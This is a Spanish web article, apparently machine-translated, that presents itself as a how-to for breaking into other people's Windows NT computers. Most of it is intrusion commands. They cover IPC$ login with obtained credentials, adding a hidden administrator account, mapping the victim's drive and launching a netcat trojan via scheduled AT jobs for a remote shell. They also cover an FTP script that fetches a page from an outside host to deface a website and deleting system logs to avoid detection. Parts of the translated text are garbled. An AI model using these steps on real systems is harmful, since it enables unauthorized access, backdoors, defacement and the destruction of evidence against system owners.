Cómo ingresar a los sistemas operativos de otras personas en línea.
Cómo ingresar a las computadoras de otras personas - -
Cuando estaba en la universidad, tomé el curso de programación de computadoras de ACCP. Era solo un pasatiempo que no estudiaba mucho. Más interesado en algunas cosas complicadas, lo que más hice en ese momento fue intentar ingresar a las computadoras y servidores de otras personas...
1. Obtener la dirección IP de la otra parte, como XX.XX.XX. .XX. Hay demasiados métodos que no están detallados.
2. Determine la ubicación de acceso a Internet de la otra parte, abra una ventana de DOS y escriba TRACERT XX.XX.XX.XX. La información reflejada en las líneas 4 y 5 es la ubicación de acceso a Internet de la otra parte.
3. Obtenga el nombre de la computadora de la otra parte, abra una ventana de DOS y escriba NBTSTAT -A XX.XX.XX.XX La primera línea es el nombre de la computadora de la otra parte, la segunda línea es el grupo de trabajo donde se encuentra la computadora de la otra parte, y la tercera línea es Instrucciones para la computadora de la otra parte
4. Hay un archivo llamado LMHOSTS.SAM en el directorio de Windows. Cámbiele el nombre a LMHOSTS y elimínelo. contenido y escriba la IP de la otra parte y el nombre de la computadora en el archivo en el siguiente formato: XX .XX.XX.XX nombre de la computadora
5. Abra la ventana de DOS y escriba NBTSTAT -R 6. Ingrese el nombre de la computadora de la otra parte en Start-Search-Computer, haga clic en la computadora de la otra parte para ingresar
Hacker Command 1: NET
Siempre que tenga el nombre de usuario y la contraseña de un determinado IP, ¡usa IPC$ para conectarte!
Aquí asumimos que el usuario que obtiene es hbx y la contraseña es 123456. Supongamos que la IP de la otra parte es
127.0.0.1
net use \\127.0.0.1\ipc$ "123456" /user:"hbx"
Salir del comando Sí
net use \\127.0.0.1\ipc$ /delte
Debe iniciar sesión antes de poder utilizar las siguientes operaciones. El método de inicio de sesión se encuentra arriba. >
----------------------
A continuación hablaremos de cómo crear un usuario, porque la autoridad de SA es equivalente al superusuario del sistema
Cuenta
Agreguemos un usuario heibai cuya contraseña es lovechina
usuario neto heibai lovechina /add
Siempre que el comando se muestre correctamente, podremos agregarlo al grupo de administradores
net localgroup Administrators heibai /add
-------. ------------------- --
Aquí estamos hablando de mapear la unidad C de la otra parte. Por supuesto, también se pueden usar otras unidades. Mientras existan, aquí
asignamos la unidad C de la otra parte a la unidad Z local
net use z:\\127.0.0.1\c$
.-----------------------
net start telnet
Esto puede abrir el TELNET de la otra parte service.
------------------- ---
Aquí está la activación del usuario invitado. El invitado es el usuario predeterminado. de NT y no se puede eliminar?
No sé si este es el caso, pero mi 2000 simplemente no puede eliminarlo.
usuario neto invitado /activo: sí
-----------------------
Aquí cambiamos la contraseña de un usuario Cambiamos la contraseña de invitado a lovechina
Otros usuarios también pueden hacerlo.
¡Siempre y cuando tengas permiso!
usuario de red invitado lovechina
Comando hacker 2: en
Generalmente, un intruso dejará una puerta trasera después de la intrusión, que consiste en colocar un caballo de Troya. Se ha subido un troyano, ¿cómo activarlo?
Entonces necesitas usar el comando AT. Se supone que has iniciado sesión en ese servidor.
Primero debe obtener la hora de la otra parte.
hora neta \\127.0.0.1
devolverá una hora, asumiendo que la hora es 12:1. , Ahora necesitamos crear un nuevo trabajo con ID=1
en \\127.0.0.1 12:3 nc.exe
Aquí asumimos que hay un troyano llamado NC.EXE. debe estar en el servidor de la otra parte.
Aquí hay una introducción a NC. NC es la abreviatura de NETCAT. Para facilitar la entrada, generalmente se le cambia el nombre. Servicio TELNET con puerto 99.
Espere hasta las 12:3 para conectarse al puerto 99 de la otra parte. Esto instalará un caballo de Troya para la otra parte.
Comando hacker 3: telnet.
Este comando es muy práctico. Puede conectarse a una ubicación remota, pero normalmente requiere una contraseña y un usuario. Sin embargo, usted instaló un troyano para la otra parte y se conectó directamente al puerto abierto por el troyano.
telnet 127.0.0.1 99
De esta manera, puede conectarse al puerto 99 de la otra parte. Luego puede ejecutar comandos en la otra parte, que también es
un asador.
Hacker Command 4: FTP
Puede transferir sus cosas a la máquina de la otra parte. Puede solicitar un espacio que admita la carga FTP. p>
Hay muchos en China. Sí, si realmente no puedes encontrarlo, te daré un truco (el nombre de usuario que usaste cuando presentaste la solicitud)
prueba (la contraseña que usaste). utilizado cuando presentó la solicitud)
obtenga index.htm c:\ inetpub\wwwroot\index.htm (aquí puede descargar el index.htm en su espacio
al c de la otra parte :\inetpub\wwwroot\index.htm)
adiós (salga del diálogo FTP, equivalente a DOS en 98, use EXIT para salir de DOS)
Métodos específicos:
Ingrese echo open upload.chinaren.com> c:\cnhack.txt
p>
Ingrese echo cnhack >> c:\cnhack.txt
Ingrese echo 39abs >> c:\cnhack.txt
Ingrese echo get index.htm
c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
Finalmente ingrese ftp -s:c:\cnhack.txt (usando el parámetro -s de ftp, ejecute el contenido
en el archivo. )
Cuando se completa el comando, el archivo se habrá descargado en el archivo que usted especificó.
Nota: Después de obtener el archivo, elimine cnhack.txt. (Si no la elimina, es fácil que
otros vean su contraseña).
Recuerde eliminar c:\cnhack.txt
Hacker Comando 11:attrib
Este comando establece los atributos del archivo. Si desea piratear un sitio web y el atributo de archivo
de su página de inicio está configurado como de solo lectura, será muy lamentable. No podrá eliminarlo incluso si desea sobrescribirlo
Está bien.
¡caer! Pero no temas si tienes este pedido.
attrib -r index.htm
Este comando elimina el atributo de solo lectura de index.htm.
Si cambia "-" a "+", establecerá el atributo de este archivo en solo lectura-------------------- --
attrib +r index.htm
Este comando establece las propiedades de index.htm en solo lectura.
Hacker Command 12:del
¡No te caigas cuando veas este título! Ahora tenemos que salir de 127.0.0.1 y eliminar el registro. ¡Por supuesto que tenemos que eliminar el registro! ¿Quieres que te atrapen? jeje.
Los registros de NT incluyen estos
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\* . evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\ winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
Simplemente elimine estos Eso es él. Algunos sistemas NT se instalan en la unidad D u otras unidades, por lo que es necesario cambiar C
a otra unidad.